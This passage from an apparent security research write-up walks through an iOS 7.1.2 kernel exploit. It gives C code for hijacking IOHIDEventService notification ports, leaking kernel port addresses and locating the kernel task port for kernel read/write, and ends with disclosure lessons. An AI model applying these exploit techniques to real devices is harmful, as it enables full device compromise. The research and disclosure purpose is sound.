                  REMOTE_CSTRING("IOHIDEventService"));
 
uint32_t remote_service =
 task_remote_call(bbd_task_port,
                  IOServiceGetMatchingService,
                  2,
                  REMOTE_LITERAL(0),
                  REMOTE_LITERAL(remote_matching));
 
uint32_t remote_conn = 0;
uint32_t remote_err =
 task_remote_call(bbd_task_port,
                  IOServiceOpen,
                  4,
                  REMOTE_LITERAL(remote_service),
                  REMOTE_LITERAL(0x1307), // remote mach_task_self()
                  REMOTE_LITERAL(0),
                  REMOTE_OUT_BUFFER(&remote_conn,
                                    sizeof(remote_conn)));
 
mach_port_t conn =
 pull_remote_port(bbd_task_port,
                  remote_conn,
                  MACH_MSG_TYPE_COPY_SEND);

We then just need to call external method 0 to "open" the queue and IOConnectMapMemory to map the queue shared memory into our process and find the mach message header:

vm_address_t qaddr = 0;
vm_size_t qsize = 0;

IOConnectMapMemory(conn,
                  0,
                  mach_task_self(),
                  &qaddr,
                  &qsize,
                  1);

mach_msg_header_t* shm_msg =
 (mach_msg_header_t*)(qaddr + qsize - 0x18);

In order to set the queue's notification port we need to call IOConnectSetNotificationPort on the userclient:

mach_port_t notification_port = MACH_PORT_NULL;
mach_port_allocate(mach_task_self(),
                  MACH_PORT_RIGHT_RECEIVE,
                  &notification_port);

uint64_t ref[8] = {0};
IOConnectSetNotificationPort(conn,
                            0,
                            notification_port,
                            ref);

We can then see the kernel address of that port's ipc_port in the shared memory message:

+0x00001010 00000013  // msgh_bits
+0x00001014 00000018  // msgh_size
+0x00001018 99a3e310  // msgh_remote_port
+0x0000101c 00000000  // msgh_local_port
+0x00001020 00000000  // msgh_reserved
+0x00001024 00000000  // msgh_id


We now need to determine the heap address of an early kernel port. If we just call IOConnectSetNotificationPort with a send right to the host_self port, we get an error:

IOConnectSetNotificationPort error: 1000000a (ipc/send) invalid port right

This error is actually from the MIG client code telling us that the MIG serialized message failed to send. IOConnectSetNotificationPort is a thin wrapper around the MIG generated io_connect_set_notification_port client code. Let's take a look in device.defs which is the source file used by MIG to generate the RPC stubs for IOKit:

routine io_connect_set_notification_port(
   connection        : io_connect_t;
in notification_type : uint32_t;
in port              : mach_port_make_send_t;
in reference         : uint32_t);

Here we can see that the port argument is defined as a mach_port_make_send_t, which means that the MIG code will send the port argument in a port descriptor with a disposition of MACH_MSG_TYPE_MAKE_SEND, which requires the sender to hold a receive right. But in mach there is no way for the receiver to determine whether the sender actually held a receive right and made a new send right, or instead just sent a copy of an existing send right via MACH_MSG_TYPE_COPY_SEND. This means that all we need to do is modify the MIG client code to use a COPY_SEND disposition and then we can set the queue's notification port to any send right we can acquire, irrespective of whether we hold a receive right.
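
A minimal sketch of the change, assuming the patched client stub builds its outgoing port descriptor roughly as the MIG-generated code does (the helper name is mine; field names follow mach_msg_port_descriptor_t):

#include <mach/mach.h>

// fill in the port descriptor for the notification port argument
static void fill_port_descriptor(mach_msg_port_descriptor_t *desc,
                                 mach_port_t port) {
    desc->name = port;
    // the generated stub uses MACH_MSG_TYPE_MAKE_SEND, which requires us to
    // hold a receive right; COPY_SEND lets us pass any send right we hold
    desc->disposition = MACH_MSG_TYPE_COPY_SEND;
    desc->type = MACH_MSG_PORT_DESCRIPTOR;
}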

Doing this and passing the name we get from mach_host_self() we can learn the host port's kernel address:

host port: 0x8e30cee0

Leaking a couple of early ports which are likely to come from the same memory page and finding the greatest common factor gives us a good guess for the size of an ipc_port_t in this version of iOS:

master port: 0x8e30c690
host port: 0x8e30cee0
GCF(0x690, 0xee0) = 0x70

Looking at the XNU source we can see that the host port is allocated before the kernel task port, and since this was before the zone allocator freelist randomisation mitigation was introduced this means that the address of the kernel task port will be somewhere below the host port.

By setting the msgh_local_port field to the address of the host port minus 0x70, then decrementing it by 0x70 each time we receive a notification message, we will be sent a different early port with each notification. Doing this we learn that the kernel task port is allocated 5 ports after the host port, meaning that the address of the kernel task port is host_port_kaddr - (5*0x70).
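
In code, each step of that scan is just a 32-bit write into the shared-memory message; a minimal sketch (the slot pointer, helper name and 0x70 stride are assumptions based on the layout and GCF guess above):

#include <stdint.h>

// on this 32-bit kernel the msgh_local_port slot of the kernel's notification
// message holds a raw ipc_port pointer, so whatever kernel address we write
// here comes back to us as a port right when the next notification fires
static void guess_next_port(volatile uint32_t *msgh_local_port_slot,
                            uint32_t *guess) {
    *guess -= 0x70;                 // step back one ipc_port within the zone page
    *msgh_local_port_slot = *guess;
}

// five steps below the host port we find the kernel task port:
//   kernel_task_port_kaddr = host_port_kaddr - (5 * 0x70)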

Putting it all together
You can get my exploit for iOS 7.1.2 here; I've only tested it on an iPhone 4. You'll need to use an old version of Xcode to build and run it; I'm using Xcode 7.3.1.

Launch the app, press the home button to trigger an HID notification message and enjoy read/write access to kernel memory. :)

In 2014, then, it seems that with enough OS internals knowledge and the right set of bugs it was pretty easy to build a logic bug chain to get kernel memory read/write. Things have certainly changed since then, but I'd be interested to compare this post with another one in 2022 looking back to 2018.

Lessons
Variant analysis is really important, but attackers are the only parties incentivized to do a good job of it. Why did the userspace variant of this IODataQueue issue persist for four more years after almost the exact same bug was fixed in the kernel code?

Let's also not underplay the impact that just the userspace version of the bug alone could have had. Prior to mach_portal, due to a design quirk of the com.apple.iohideventsystem MIG service, backboardd had send rights to a large number of other processes' task ports, meaning that a compromise of backboardd was also a compromise of those tasks.

Some of those tasks ran as root meaning they could have exploited the processor_set_tasks vulnerability to get the task ports for any task on the device, which despite being a known issue also wasn't fixed until I exploited it in triple_fetch.

This IODataQueue issue wasn't the only variant I found as part of this project; the deja-xnu project for iOS 11.4.1 also contains PoC code to trigger a MIG code generation bug in clients of backboardd, and the Project Zero tracker has details of further issues.

A final note on security bulletins
You'll notice that none of the issues I've linked above are mentioned in the iOS 12 security bulletin, despite being fixed in that release. Apple are still yet to assign CVEs for these issues or publicly acknowledge that they were fixed in iOS 12. In my opinion a security bulletin should mention the security bugs that were fixed. Not doing so provides a disincentive for people to update their devices since it appears that there were fewer security fixes than there really were.